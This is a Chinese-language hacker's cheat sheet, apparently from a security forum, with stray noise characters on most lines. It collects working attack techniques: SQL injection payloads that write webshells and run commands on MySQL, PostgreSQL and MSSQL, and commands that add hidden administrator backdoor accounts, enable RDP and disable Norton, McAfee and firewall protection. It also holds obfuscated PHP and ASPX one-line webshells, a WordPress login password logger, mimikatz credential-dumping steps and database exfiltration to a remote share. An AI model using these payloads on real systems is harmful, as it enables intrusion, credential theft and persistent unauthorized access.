- p) H* @/ K% Xinsert into a values ("set wshshell=createobject (""wscript.shell"") " );
$ y" t: B( m0 K% yinsert into a values ("a=wshshell.run (""cmd.exe /c net user test 123!@#abcABC /add"",0) " );
; j/ H- h8 R5 ~( N% b" w5 Dinsert into a values ("b=wshshell.run (""cmd.exe /c net localgroup administrators test /add"",0) " );# ^0 z' d% B) v6 k
select * from a into outfile "C:\\Documents and Settings\\All Users\\「开始」菜单\\程序\\启动\\a.vbs";
. S$ r N# u! K4 G$ Pdrop table a;* ~. ~3 S" A* Q$ Z; P
D+ N% \$ Z7 O; Q7 S. V
英文版本:
! H, g h0 \ N6 A3 V) K
' m, `9 U. T+ `) R) ]5 |use test;
# F5 l) ]5 G( |% _% c* m) Pcreate table a (cmd text);
3 [; i& o3 l" F3 j7 j8 f; |insert into a values ("set wshshell=createobject (""wscript.shell"") " );
; a# `( E% b3 tinsert into a values ("a=wshshell.run (""cmd.exe /c net user test 123!@#abcABC /add"",0) " );( Z+ d9 f& F. C! J
insert into a values ("b=wshshell.run (""cmd.exe /c net localgroup administrators test /add"",0) " );
& f# Z& d/ _0 C1 _select * from a into outfile "C:\\Documents and Settings\\All Users\\Start Menu\\Programs\\Startup\\a.vbs";+ ~- U( A6 g6 x g( i, Z
drop table a;
8 j3 A% `' _; A* [
! b, d& e5 z& |/ |% M* V# ncreate table a (cmd BLOB);
4 z, q+ G) ]" h. |5 q! s9 Einsert into a values (CONVERT(木马的16进制代码,CHAR));
! f/ n; y) H8 U9 E. u1 _& ]select * from a into dumpfile 'C:\\Documents and Settings\\All Users\\「开始」菜单\\程序\启动\\mm.exe'' F; K% t* {5 C. _
drop table a;
4 \2 W& l( }% Q r0 Q% ?$ \" ~/ o0 r, p9 V+ P
记录一下怎么处理变态诺顿
6 c+ e6 L% T8 ]! y% d# M3 G查看诺顿服务的路径
N1 W. y8 V7 E" Bsc qc ccSetMgr/ n% ~8 v9 s) ^ h( S! ~
然后设置权限拒绝访问。做绝一点。。
. b! R- y4 h2 Z; J2 d* ocacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d system) G) y- v, s2 L
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d "CREATOR OWNER". g* X6 L' n; m/ K( m7 x% l3 W
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d administrators
% e5 y% {1 Q( v: G. t% pcacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d everyone2 \ X- @4 ~) o
9 O! i4 t. z9 G% w0 R
然后再重启服务器9 @- r; D! v. k' M* p
iisreset /reboot) d) K9 m8 q5 o6 T, E
这样就搞定了。。不过完事后。记得恢复权限。。。。
7 y! G, P9 c# F, O1 i) Vcacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G system:F1 O% i( p% i0 z8 x
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G "CREATOR OWNER":F
0 c4 [9 g' Y$ S: ^% p) B& r: O1 ~7 pcacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G administrators:F* D" q1 J1 E1 _: C3 j- w3 ~& r, @$ K2 W
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G everyone:F
/ h0 q8 J5 `; V) @/ ASELECT '<%eval(request(chr(35)))%>' into [fuck] in 'E:\asp.asp;fuck.xls' 'EXCEL 4.0;' from admin3 ^8 w' f- y$ W2 U, W9 s1 ^
7 Q1 A0 I. C1 ?; `5 g
EXEC('ma'+'ster..x'+'p_cm'+'dsh'+'ell ''net user''')
5 U1 x, e, }( L2 O) a* `( b- U4 D
, N$ y9 z7 W+ j: w3 I4 Mpostgresql注射的一些东西5 F( S t) X! r/ R, g3 n/ f; o4 d1 o
如何获得webshell
, q- G1 s, {+ v- x7 Jhttp://127.0.0.1/postgresql.php?id=1;create%20table%20fuck(shit%20text%20not%20null);
M# n% Y2 h- e& thttp://127.0.0.1/postgresql.php?id=1;insert into fuck values($$<?php eval($_POST[cmd]);?>$$);
9 C! P ^! X, b: ?http://127.0.0.1/postgresql.php?id=1;copy%20fuck(shit)%20to%20$$/tmp/test.php$$;- g% J# T' z3 t3 ]) x; T. x4 V+ }
如何读文件% U; v: N) {* c3 x' V8 Y6 R0 Z
http://127.0.0.1/postgresql.php?id=1;create table myfile (input TEXT);
5 V6 @3 N1 ~. ?' a" {http://127.0.0.1/postgresql.php?id=1;copy myfile from ‘/etc/passwd’;
* t2 d# R9 o) b' dhttp://127.0.0.1/postgresql.php?id=1;select * from myfile;- n3 Q) L" z$ z H h D* e
) ?, K/ z% V$ i' N4 t7 a' s1 xz执行命令有两种方式,一种是需要自定义的lic函数支持,一种是用pl/python支持的。
3 j2 Z4 V) |! _3 ~, \/ q当然,这些的postgresql的数据库版本必须大于8.X
% q4 m- _0 m6 c5 c+ S创建一个system的函数:5 f9 k( W! B1 Q( e
CREATE FUNCTION system(cstring) RETURNS int AS '/lib/libc.so.6', 'system' LANGUAGE 'C' STRICT& P" i! X0 K" H& A
1 t1 } G& o. x. C* n! M
创建一个输出表:
/ _$ Z1 P6 U6 M0 C, X( x3 N+ L- v% vCREATE TABLE stdout(id serial, system_out text)) W- v, K" A! f1 t: T9 R8 c3 J
5 v; \8 X. s, w4 F0 [
执行shell,输出到输出表内:
/ v6 w. c4 C @8 PSELECT system('uname -a > /tmp/test')
1 }) Y$ b; ]& t9 D- U1 s
" I9 t9 a* a8 C9 ^copy 输出的内容到表里面;/ @" g, f0 ^6 n/ a! w9 |* p
COPY stdout(system_out) FROM '/tmp/test'' e: d1 s0 ~( V3 v/ _+ s
* F; k. n& k: x4 V* ]$ d& o$ q
从输出表内读取执行后的回显,判断是否执行成功- Z/ Y- I* n! {& x
+ X8 _ w! Y7 f4 ?
SELECT system_out FROM stdout
4 x4 N6 b- E+ h下面是测试例子, L' X. Q7 K4 a( s1 m
, u7 e$ E; w4 l* h2 e) e% C+ |
/store.php?id=1; CREATE TABLE stdout(id serial, system_out text) -- 6 P6 y1 `' e* G( V, Q
; b7 p" ?1 g6 J K9 f7 f
/store.php?id=1; CREATE FUNCTION system(cstring) RETURNS int AS '/lib/libc.so.6','system' LANGUAGE 'C': \, g# o `. b/ t
STRICT --
% H- t" ^+ v" q6 w7 c" ?5 M' }2 }8 X2 F3 b( y# E. Y$ n$ V' x
/store.php?id=1; SELECT system('uname -a > /tmp/test') --
& @. a; U" e6 {; m) ~9 _. s+ @, r2 q/ c/ Y5 G, o
/store.php?id=1; COPY stdout(system_out) FROM '/tmp/test' --
: y4 J; H& r4 K |5 v" F, M- z
$ D. K1 j! q7 d M/store.php?id=1 UNION ALL SELECT NULL,(SELECT stdout FROM system_out ORDER BY id DESC),NULL LIMIT 1 OFFSET 1--
! N( Z l1 T4 f3 Xnet stop sharedaccess stop the default firewall6 m7 m7 _. i1 @" G# z# m h
netsh firewall show show/config default firewall
$ n/ p* [4 X4 O4 o" l8 M0 Jnetsh firewall set notifications disable disable the notify when the program is disabled by the default firewall
# u2 G/ e; O# J j5 r: mnetsh firewall add allowedprogram c:\1.exe Svchost add the program which is allowed by default firewall7 E; _$ l" }9 B
修改3389端口方法(修改后不易被扫出): o7 Y6 a7 M; c! c& w' y$ v
修改服务器端的端口设置,注册表有2个地方需要修改) r% j! L* d" }9 W( V9 z
4 Q; i3 F5 k' w4 K* W3 V7 O[HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\TerminalServer\\Wds\\rdpwd\\Tds\\tcp]$ D* e. P; O0 u+ O% _
PortNumber值,默认是3389,修改成所希望的端口,比如6000
, G2 F0 v2 z, B+ v& T2 V2 M# {/ y$ |# |+ g, L% g- |
第二个地方:: O w' @. F+ R& C) p
[HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\\WinStations\\RDP-Tcp] R$ G2 J `! N' i; I# ]4 S# m
PortNumber值,默认是3389,修改成所希望的端口,比如6000; I( |& b8 H. U/ {2 c: P+ K, c, i
- n" ^4 K4 h+ [1 e# \现在这样就可以了。重启系统就可以了- K, W& \* u/ R( U2 V3 G, @
' S" X! r' E. o$ }* s查看3389远程登录的脚本
! e- v, P/ \ Q2 L0 Y% b保存为一个bat文件
2 P' }. P& P/ c9 D6 gdate /t >>D:\sec\TSlog\ts.log
! X2 x- [7 R0 v4 a0 \time /t >>D:\sec\TSlog\ts.log- W* A. W1 b- s$ Z7 }! f# k% T8 J
netstat -n -p tcp | find ":3389">>D:\sec\TSlog\ts.log/ m5 Y# k9 Z- b. e3 E+ T A L
start Explorer
2 B. r5 _7 x5 v8 G& C7 a1 [& L& [$ g+ @, }% g! S
mstsc的参数:/ d5 K3 f3 d0 Q/ H4 f
- B9 m5 L7 ~+ S& V* I9 T7 P
远程桌面连接
1 k+ T" N7 t+ T' _( e, o( E) H
8 y" D( C& d" T8 a0 j3 |4 ]4 y& g. }MSTSC [<Connection File>] [/v:<server[:port]>] [/console] [/f[ullscreen]]2 `0 Z2 R2 D3 m# z J w
[/w:<width> /h:<height>] | /Edit"ConnectionFile" | /Migrate | /?
! w0 ?" _. b$ Z; p% a
% S: D D# s# P<Connection File> -- 指定连接的 .rdp 文件的名称。. [2 R0 K9 n/ @9 Y9 U
# G; R N# |' H! m) Z5 }9 q/v:<server[:port]> -- 指定要连接到的终端服务器。
$ k6 j6 |/ h9 U3 |# |: B- Q( m' N2 Y: V" X9 [3 T5 Z, w$ i
/console -- 连接到服务器的控制台会话。+ o$ W8 L! @$ J# A( H: A
8 ]$ _* T! W2 ]6 p, S! L
/f -- 以全屏模式启动客户端。
/ q; \$ |) E; `4 t: N( T- v& c$ f- f U$ c; o) [* \
/w:<width> -- 指定远程桌面屏幕的宽度。
2 T* A' `4 e/ M8 X8 r* q0 s# d/ r! E% b0 ? u" S0 D
/h:<height> -- 指定远程桌面屏幕的高度。
6 U! q( v b; O% G( S4 t: Y
* ]0 f: _, p" [- T/edit -- 打开指定的 .rdp 文件来编辑。& A" H: ?" L7 U3 \+ ^. `' [. G
3 }* J3 T9 | s3 t* q) O/migrate -- 将客户端连接管理器创建的旧版
& E& @/ q' G& z& F1 |4 |$ n" a7 m连接文件迁移到新的 .rdp 连接文件。$ o# p T* J! o( c6 n
! y/ M: x/ q" d
# h/ Z9 Y* V1 @# {: k其中mstsc /console连接的是session 0,而mstsc是另外打开一个虚拟的session,这样的话就是相当与另外登陆计算机。也就是说带console参数连接的是显示器显示的桌面。大家可以试试啊,有的时候用得着的,特别是一些软件就
, Y* f9 |1 w3 a8 y4 b- pmstsc /console /v:124.42.126.xxx 突破终端访问限制数量5 U9 N$ ^/ o, a% a) A; _1 ]
9 `4 g3 a/ A+ _4 m
命令行下开启3389, [7 I- a5 H8 }: f; @+ ?
net user asp.net aspnet /add F3 u7 P3 s: e! g
net localgroup Administrators asp.net /add9 C" {$ ]9 q2 u5 _: M1 E& h
net localgroup "Remote Desktop Users" asp.net /add) `" o& c, b# E6 ]
attrib +h "%SYSTEMDRIVE%\Documents and Settings\asp.net" /S /D
3 D6 p, u J/ Y5 |+ Techo Y | reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t reg_dword /d 0
1 x H( r! L9 a- ~echo Y | reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v AllowTSConnections /t reg_dword /d 1
8 p/ }$ c/ n) kecho Y | reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v "asp.net" /t REG_DWORD /d 00000000 /f8 V* s* d* K7 l8 y/ r3 Q
sc config rasman start= auto
4 m: {- g8 O" @1 K5 M' @sc config remoteaccess start= auto
! V3 W1 j& T2 P" [8 `' v8 V: p' L anet start rasman$ b6 [& y v, D, T3 z
net start remoteaccess
2 e5 ~$ Y0 }3 U6 PMedia: l9 i- q1 N- |9 [) L+ s, s; v
<form id="frmUpload" enctype="multipart/form-data"
* T* b+ V( T2 d0 H# |$ w6 @action="http://www.site.com/FCKeditor/editor/filemanager/upload/php/upload.php?Type=Media" method="post">Upload a new file:<br>& J8 a5 M( p D9 ]& V
<input type="file" name="NewFile" size="50"><br>
+ ^8 @4 T7 _' b" o. y" X<input id="btnUpload" type="submit" value="Upload">
; O/ Q0 m. |6 k</form>
0 \) \6 q3 P; a# E
' T6 j' p* N1 Scontrol userpasswords2 查看用户的密码& ]- L+ f8 S+ c; M: a+ N
access数据库直接导出为shell,前提a表在access中存在。知道网站的真实路径
0 I: \; S% r1 l: b8 HSELECT '<%execute request("a")%>' into [a] in 'c:\x.asp;a.xls' 'excel 8.0;' from a% X9 n" F+ T% z4 `6 W) e
2 l# `5 B4 X8 e8 V C- a7 _, L141、平时手工MSSQL注入的时候如果不能反弹写入,那么大多数都是把记录一条一条读出来,这样太累了,这里给出1条语句能读出所有数据:" H5 h/ [% z. J3 ^6 u
测试1:
& c2 o) B9 P7 ?; r6 O$ zSELECT top 1 name=STUFF((SELECT ','+[name] FROM sysobjects t where xtype='U' FOR XML PATH('')), 1, 1, '') FROM sysobjects t1
H$ G6 B8 k& I7 W0 s# y! M/ X, a. e4 x1 y* Z
测试2:
) S. v" O2 ^- \% b" i
/ \3 a( @& ?$ j$ G6 f5 g1 Ucreate table dirs(paths varchar(100),paths1 varchar(100), id int)
% _4 | m+ R- r2 X5 ^1 O* Z: a6 S5 m- e- h9 b
delete dirs;insert dirs exec master.dbo.xp_dirtree 'c:\',1,1--
5 `% E4 F/ `; X# ^9 Y
" u4 N( \% ~( L- A! C! ?! j" z8 _SELECT top 1 paths=STUFF((SELECT ','+[paths] FROM dirs FOR XML PATH('')), 1, 1, '') FROM dirs t1
) @6 a* \ K7 L# c4 ?- f关闭macfee软件的方法://需要system权限,请使用at或psexec –s cmd.exe命令7 F3 H8 U" g7 {( Y% i; j
可以上传.com类型的文件,如nc.com来绕过macfee可执行限制;
. a4 Y2 E5 S9 R5 p/ E- D- I( Inet stop mcafeeframework
7 o# N. M2 v/ S8 pnet stop mcshield- }" `) E2 ?% L I( C
net stop mcafeeengineservice( @2 @) g- L2 m6 ~4 u& {
net stop mctaskmanager) _, u) x3 s/ ]
http://www.antian365.com/forum.p ... DU5Nzl8NDY5Mw%3D%3D+ G, ^: ^" c) b% }; O$ f+ t
) Z1 w& R' X6 U VNCDump.zip (4.76 KB, 下载次数: 1) , L+ @7 F: k% V4 N( h5 \
密码在线破解http://tools88.com/safe/vnc.php: M& o* o1 K8 I, k0 H" S% I% I1 E# P x
VNC密码可以通过vncdump 直接获取,通过dos查询[HKEY_LOCAL_MACHINE\SOFTWARE\RealVNC\WinVNC4] 下的Password也可以获取, M% e% O5 _6 ^8 l- N$ F: e) _2 u
, J$ g. c1 p' [2 q
exec master..xp_cmdshell 'net user'5 P/ J+ f, K# @- b2 k
mssql执行命令。
/ h: R% a l- g2 J! ~) U' z/ A获取mssql的密码hash查询' H5 F: e' K% S. h
select name,password from master.dbo.sysxlogins
V) q6 `6 r3 |/ R2 Q0 \5 T- Z! n. F# ?5 K$ G
backup log dbName with NO_LOG;" J' i0 M6 [3 f9 E9 X! U
backup log dbName with TRUNCATE_ONLY;' t7 b7 {. C+ N
DBCC SHRINKDATABASE(dbName);4 J( l" w8 F& z, @ Q
mssql数据库压缩
) [/ V- X- P' k" j( [: L" P, ^1 G$ T5 ~
Rar.exe a -ep1 -m0 -v200m E:\web\1.rar E:\webbackup\game_db_201107170400.BAK( r" h2 i) n7 V7 Q% p
将game_db_201107170400.BAK文件压缩为1.rar,大小为200M的分卷文件。, C8 O4 v M! z# R7 j
) i! r% [& y& q6 G) R, c4 q cbackup database game to disk='D:\WebSites\game.com\UpFileList\game.bak'
6 p+ K8 p, t2 F# `5 B, d备份game数据库为game.bak,路径为D:\WebSites\game.com\UpFileList\game.bak: W3 `2 y* Q x
' _3 v2 A: m! ^: _- [" h0 u; i9 ]. V
Discuz!nt35渗透要点:
R+ y# D& P" D/ e; n3 y(1)访问 网站地址/admin/global/global_templatesedit.aspx?path=../tools/&filename=rss.aspx&templateid=1&templatename=Default
6 T k8 u7 p" y" F(2)打开rss.aspx文件,将<%@ Page Inherits="Discuz.Web.UI.RssPage" %>复制到本地备份,然后替换其为<%@ Page Language="Jscript"%><%eval(Request.Item["pass"],"unsafe");%>
, u* Z: n/ m8 J |# H4 _(3)保存。
4 H6 V1 K/ y# `(4)一句话后门地址http://somesite.com.cn/tools/rss.aspx 密码为pass2 ?4 l( T$ U, \1 o1 v
d:\rar.exe a -r d:\1.rar d:\website\
- w: J4 W$ E( w* \) H递归压缩website( d4 O- C6 D" ~4 \9 j
注意rar.exe的路径3 r. ^7 P, y+ t- g, { P% g \
$ E5 q, x3 R; {4 a
<?php |9 G1 }$ f% |: ]' k0 a
6 z, Z0 v* t* r; `) @2 X; O
$telok = "0${@eval($_POST[xxoo])}";
; a2 m( k( s6 A) E
3 }& e- e) s8 e2 l$username = "123456";: X/ S; p+ j! P
# U3 P9 H* X% J1 n5 w r8 s
$userpwd = "123456";
E) [* m, n8 ^1 C* C
\+ N- {) `9 P, I: m/ }$telhao = "123456";
! L( B5 J2 I; q; I$ e! U4 w/ Z+ l4 N ?+ y2 ]6 F
$telinfo = "123456";- T) L4 V7 o: q" a" F; H' c
/ Q2 Y) u/ |0 z+ H S9 e0 l
?>
6 F' q: T1 D$ ~2 jphp一句话未过滤插入一句话木马
6 |" n5 I, _1 A( ]4 U+ }2 q' `! M4 d. `3 Y* m' p: x: v+ r& j
站库分离脱裤技巧3 b- p' w; {$ A: w7 O
exec master..xp_cmdshell 'net use \\xx.xx.xx.xx\d$\test "pass" /user:"user"'" w; I3 ]9 f: A
exec master..xp_cmdshell 'bcp test.dbo.test out \\xx.xx.xx.xx\d$\test\1.txt -c -Slocalhost -Uuser -Ppass'
1 X! R: L% ?" J j1 F条件限制写不了大马,只有一个一句话,其实要实现什么完全够了,只是很不直观方便啊,比如tuo库。$ y# V( ~* T0 S
这儿利用的是马儿的专家模式(自己写代码)。
7 S# E+ z3 c X9 K; T/ wini_set('display_errors', 1);
+ w4 |; T M/ h0 t$ uset_time_limit(0);
: p0 i i& W( M, [+ Y9 \error_reporting(E_ALL);
2 D/ L: s- p- D2 ?% j# `$connx = mysql_connect(":/var/tmp/mysql.sock", "forum", "xx!!xx3") or die("Could not connect: " . mysql_error());; u7 E. b, Z L
mysql_select_db("discuz",$connx) or die("Could not connect: " . mysql_error());+ ~' a5 Z) Q C; w+ l1 I5 `
$result = mysql_query("Select * FROM members",$connx) or die("Could not connect: " . mysql_error());6 A2 M. T! e7 j2 S
$i = 0;
3 Q3 ]4 f- A+ p8 B5 |5 V1 D$tmp = '';
9 D5 e$ C1 `" l& B/ o5 S9 Bwhile ($row = mysql_fetch_array($result, MYSQL_NUM)) {' l* E0 y0 q4 T
$i = $i+1;
8 ^( D) |, ]+ t' t! u( _ $tmp .= implode("::", $row)."\n";9 H6 A4 G* n1 C* z% J/ u3 S
if(!($i%500)){//500条写入一个文件/ g$ `4 X5 J1 \' ?3 w
$filename = '/home/httpd/bbs.xxxxx/forumdata/cache/user'.intval($i/500).'.txt';$ ^4 o& Y' V( Y
file_put_contents($filename,$tmp);+ {: n9 z" j. L3 {' C* z; m
$tmp = '';
q) I R2 b1 {! _, c: D: T }
1 k+ W) F# i" E. k}& @% ~) e# J. y0 r( F& `4 |
mysql_free_result($result);* r$ z; x' r+ W4 x
% M+ p* v: K) J" v- G
" @+ V( D8 _: {$ G8 f. c1 ^; K' }4 h5 x- K* A, H" q
//down完后delete0 M9 N$ j0 t+ j" J) V
8 u2 |& O2 |$ Q$ t& B- y8 u2 j1 s9 p# D% K d. H
ini_set('display_errors', 1); M/ S, N' }- O: s" A
error_reporting(E_ALL);
5 B* A7 p4 M* p% t7 R) Z' v$i = 0;
; i* b% W) B1 ~. Bwhile($i<32) {5 R4 _1 G6 G( N, z1 z
$i = $i+1;
% e$ z! f0 ?. e. P $filename = '/home/httpd/bbs.xxxx/forumdata/cache/user'.$i.'.txt';8 T4 g& j( l2 F" y
unlink($filename);3 u" K& x U4 J5 H8 h0 u5 P
} ; Y. Q' k! S, P/ l( o8 z% m2 W
httprint 收集操作系统指纹3 E6 t. i M1 G6 g" d' d
扫描192.168.1.100的所有端口
% G4 c# g7 J- s Pnmap –PN –sT –sV –p0-65535 192.168.1.100 B& d, q# |4 Q" p5 f) T
host -t ns www.owasp.org 识别的名称服务器,获取dns信息8 ~" C1 C1 {1 P6 b: x7 q
host -l www.owasp.org ns1.secure.net 可以尝试请求用于owasp.org的区域传输) ^" }) ?/ [, I+ i5 \* d
Netcraft的DNS搜索服务,地址http://searchdns.netcraft.com/?host' s+ T7 o1 v8 ? R0 |2 e7 ?0 Y
2 Q* Z6 T. {& \/ I8 h
Domain tools reverse IP: http://www.domaintools.com/reverse-ip/ (需要免费注册)
; j( c$ s8 ^ s3 t
8 z6 ^% I9 _1 A, Q4 Z MSN search: http://search.msn.com 语法: "ip:x.x.x.x" (没有引号)
" Z- m3 ~$ r& f+ e T8 B! H; N; Y$ E+ Y. y* U [
Webhosting info: http://whois.webhosting.info/ 语法: http://whois.webhosting.info/x.x.x.x
: f) s! n# R& ~) J9 Z) H# T" c2 p6 q
DNSstuff: http://www.dnsstuff.com/ (有多种服务可用)7 H9 d, f+ N, \- z2 S
1 r4 X! l3 M( P( h9 q% D. D
http://net-square.com/msnpawn/index.shtml (要求安装)
+ r) W' r4 B. m* b5 P) N' |+ w0 f7 `' ?& j" p
tomDNS: http://www.tomdns.net/ (一些服务仍然是非公开的)# }* E8 Z' d' t2 `
9 U9 q$ o6 N" L# P SEOlogs.com: http://www.seologs.com/ip-domains.html (反向IP/域名查找)$ q* F, s6 E: u5 H3 q
set names gb2312
3 W/ l& E' j* s, I导入数据库显示“Data too long for column 'username' at row 1”错误。原因是不支持中文。
9 _- x+ Q- t, C* q, s% u, i
1 p7 `' [4 L1 L! K2 k* ?mysql 密码修改# g2 e* L2 U1 U, F# z
UPDATE mysql.user SET password=PASSWORD("newpass") whereuser="mysqladmin ” & M& b4 i$ u/ S8 K8 R1 {
update user set password=PASSWORD('antian365.com') where user='root';' o, E/ ]6 @! c+ Y9 F; E0 }+ D
flush privileges;
. L8 H S: |3 i H4 W高级的PHP一句话木马后门
2 d2 s6 M( o$ F1 x
7 u5 e6 C5 f0 L/ n% _& U7 X) Z入侵过程发现很多高级的PHP一句话木马。记录下来,以后可以根据关键字查杀+ a f% y6 m' U0 o' E
% W/ D1 f1 k4 ]1、; h7 @. k6 \$ X( N
) l2 T' K: ^1 G* L+ g, M5 e
$hh = "p"."r"."e"."g"."_"."r"."e"."p"."l"."a"."c"."e";/ I& _2 T9 g# Z! T
8 W2 z* Q! O( o& K$ R$hh("/[discuz]/e",$_POST['h'],"Access");, [& }+ y" k1 w2 Y, I( F& a
# T! i- r; e) e" C9 _5 u
//菜刀一句话% V, `+ A9 y! [. A& J) ^. a; c2 H- _
7 Q% t. M* ?7 ~- W; w
2、8 i1 m; z3 M& Y6 z
, B+ v8 [' l4 R/ v' I7 C2 @ J& Z
$filename=$_GET['xbid'];
, O8 B# m8 m! s) L& k
, D# D) v1 y8 Z$ e- Tinclude ($filename);
$ j: G2 G& v- ~' e2 H# W1 i" x1 _
% M; |8 Y t/ t9 F8 w' w//危险的include函数,直接编译任何文件为php格式运行
/ L, E( a, I. J7 k; Y
0 j" S! Y' n6 t3、
7 ]* u, a0 i( |6 X; i I
( G! l" _# Z* E5 y6 Q- h, \) t6 w$reg="c"."o"."p"."y";
1 U, T: \- [3 F; z2 y# C" F1 I7 f1 c& I9 x2 o9 y7 F
$reg($_FILES[MyFile][tmp_name],$_FILES[MyFile][name]);
+ |3 K3 U: v% f y* V- |, n6 w! D# |$ g# v' l
//重命名任何文件2 m1 M2 a8 M; u
U8 L8 H9 Q+ C9 _/ s' L0 N3 p: }# \8 A
4、' l# ^; q: o9 k6 F6 {7 h# d9 v
4 `) K. [6 L) l+ m' ~$gzid = "p"."r"."e"."g"."_"."r"."e"."p"."l"."a"."c"."e";5 a! j) T" J7 M8 Y! F5 {# @5 Z' N
- _+ @8 R# P, v% X
$gzid("/[discuz]/e",$_POST['h'],"Access");
. K( n3 g/ \. L8 L8 {6 V* S6 U: W) g, r) T( m" V
//菜刀一句话, g' t$ I+ ^% ?5 S: [
9 Q! S$ Z+ c5 H' Y# Z" t% ?
5、include ($uid);
# ~" }, ^0 n2 `7 N* a) n
6 h- s# M* G, j- ^) U+ o4 z# l//危险的include函数,直接编译任何文件为php格式运行,POST
- I" d0 b$ _0 v. B2 D2 M# U2 T9 |2 a. B: k; k& O
- V2 k4 X9 H* {7 T3 O
//gif插一句话6 W* L- L! Y4 e& ]# k
6 x$ ~" z. _8 c+ a l
6、典型一句话
. ] _. N% q' Y% Y3 V# T4 I. C5 w- W4 E3 i
程序后门代码
+ |0 e4 A4 A) f<?php eval_r($_POST[sb])?>
+ E* J: t2 Y$ l& g" V程序代码 @& B$ F- \4 i4 r; v$ j
<?php @eval_r($_POST[sb])?>+ c" @8 _2 Q* U l% ?" T. l j
//容错代码# ~) W0 p; r7 O4 b) ]" Y
程序代码/ k2 o* U0 Q0 N# n
<?php assert($_POST[sb]);?>8 g) g3 X7 t. J3 _, g$ b% R, s. d
//使用lanker一句话客户端的专家模式执行相关的php语句
. f7 t" R6 C3 B9 O5 P. n9 J程序代码* q% ^3 j8 R! u4 @
<?$_POST['sa']($_POST['sb']);?>1 n' F! k6 k+ H
程序代码% i; `" \ f- `5 y* {! J
<?$_POST['sa']($_POST['sb'],$_POST['sc'])?>( ^ E' ~& p2 D. h
程序代码- @+ c/ H' H# ^ c1 Q
<?php& {- Q H) A. o0 p. P4 f, A
@preg_replace("/[email]/e",$_POST['h'],"error");
; i3 ^" N, W' W+ X% ~; p: {?>
0 r/ p+ o, k# ?4 n4 I+ \; A//使用这个后,使用菜刀一句话客户端在配置连接的时候在"配置"一栏输入
* M. v' b5 e( c/ i' U9 k5 W# w程序代码# O! z+ p' P5 @! z
<O>h=@eval_r($_POST[c]);</O>- [" a2 Y, v! Z7 b
程序代码
# H+ M' A- E! x+ I6 p% [<script language="php">@eval_r($_POST[sb])</script>9 Y+ M" o3 b) O- ~2 m' Q
//绕过<?限制的一句话
2 a0 N* |' o9 F
. g9 {3 v m. Fhttp://blog.gentilkiwi.com/downloads/mimikatz_trunk.zip
. w( { j% }; ]8 s详细用法:% L/ W3 ^+ k, n1 R) E/ S4 V2 c5 f$ v
1、到tools目录。psexec \\127.0.0.1 cmd4 ^- P0 q3 O* N' R8 E! ?+ T
2、执行mimikatz
0 E3 \5 B' }6 [ Q) Y7 e% }) y3、执行 privilege::debug+ G/ M4 v2 `% m% }: t4 U" U* q
4、执行 inject::process lsass.exe sekurlsa.dll! u, m/ D- W/ G! \
5、执行@getLogonPasswords0 }/ |8 x& q9 l. Q3 e
6、widget就是密码
6 r+ s, d5 V) d: f7、exit退出,不要直接关闭否则系统会崩溃。9 u, c& O8 a: J, e
- I0 ~2 b U9 o' T( ?$ Rhttp://www.monyer.com/demo/monyerjs/ js解码网站比较全面
) o( v* E" z) ~1 s2 `: p+ L9 `0 M1 P# Y' c$ ^( R! h( D# }
自动查找系统高危补丁' n* E5 |' @& \1 ?
systeminfo>a.txt&(for %i in (KB2360937 KB2478960 KB2507938 KB2566454 KB2646524 KB2645640 KB2641653 KB944653 KB952004 KB971657 KB2620712 KB2393802 kb942831 KB2503665 KB2592799) do @type a.txt|@find /i "%i"||@echo %i Not Installed!)&del /f /q /a a.txt
# X) H! k* W, E8 X. k) \* }
6 d# G2 a3 Q% c: M0 a- i突破安全狗的一句话aspx后门
: J: R7 Q9 C* g6 N0 P: A<%@ Page Language="C#" ValidateRequest="false" %>7 f; m3 w" ~' S- x& Y6 G2 Z
<%try{ System.Reflection.Assembly.Load(Request.BinaryRead(int.Parse(Request.Cookies["你的密码"].Value))).CreateInstance("c", true, System.Reflection.BindingFlags.Default, null, new object[] { this }, null, null); } catch { }%>
! i+ l/ g8 r9 o5 t" _% Vwebshell下记录WordPress登陆密码5 A0 k8 P! x5 q0 p+ J1 z5 ~0 b! j2 q
webshell下记录Wordpress登陆密码方便进一步社工' s' y- X+ z! ?) a9 B7 W
在文件wp-login.php中539行处添加:( z1 u% \% [( i# c
// log password
! W, _ I0 x, E/ C0 _$log_user=$_POST['log'];
" P( {7 N2 Q3 X" a1 \: f$log_pwd=$_POST['pwd'];& x! N; U$ z- r; m0 z
$log_ip=$_SERVER["REMOTE_ADDR"];
1 O6 w: }" [+ u- m: a$txt=$log_user.’|’.$log_pwd.’|’.$log_ip;
* |, V n" c; j/ T: x$txt=$txt.”\r\n”;' Q$ ]1 s( T8 ~$ V- o
if($log_user&&$log_pwd&&$log_ip){+ a R* a1 A5 ]3 r ]0 x3 H
@fwrite(fopen(‘pwd.txt’,”a+”),$txt);
8 |$ E) e1 z, Y}
: t7 X" A4 F5 [9 @( m+ U当action=login的时候会触发记录密码code,当然了你也可以在switch…case..语句中的default中写该代码。
* S$ k& b% i% C* U/ m3 @$ g就是搜索case ‘login’ \ q6 F e8 Z' P) E
在它下面直接插入即可,记录的密码生成在pwd.txt中,
/ c5 Z7 f0 l4 J, V, q其实修改wp-login.php不是个好办法。容易被发现,还有其他的方法的,做个记录
1 }8 Q s2 ]- W0 [ z# b0 F利用II6文件解析漏洞绕过安全狗代码:
" ?4 O7 n" Z, N# t;antian365.asp;antian365.jpg
8 F' @3 [0 H; Q6 d5 N% ?. t1 M7 J' n% o2 \ J8 v! h' s) K
各种类型数据库抓HASH破解最高权限密码!9 @+ [4 [$ G" z# H
1.sql server2000
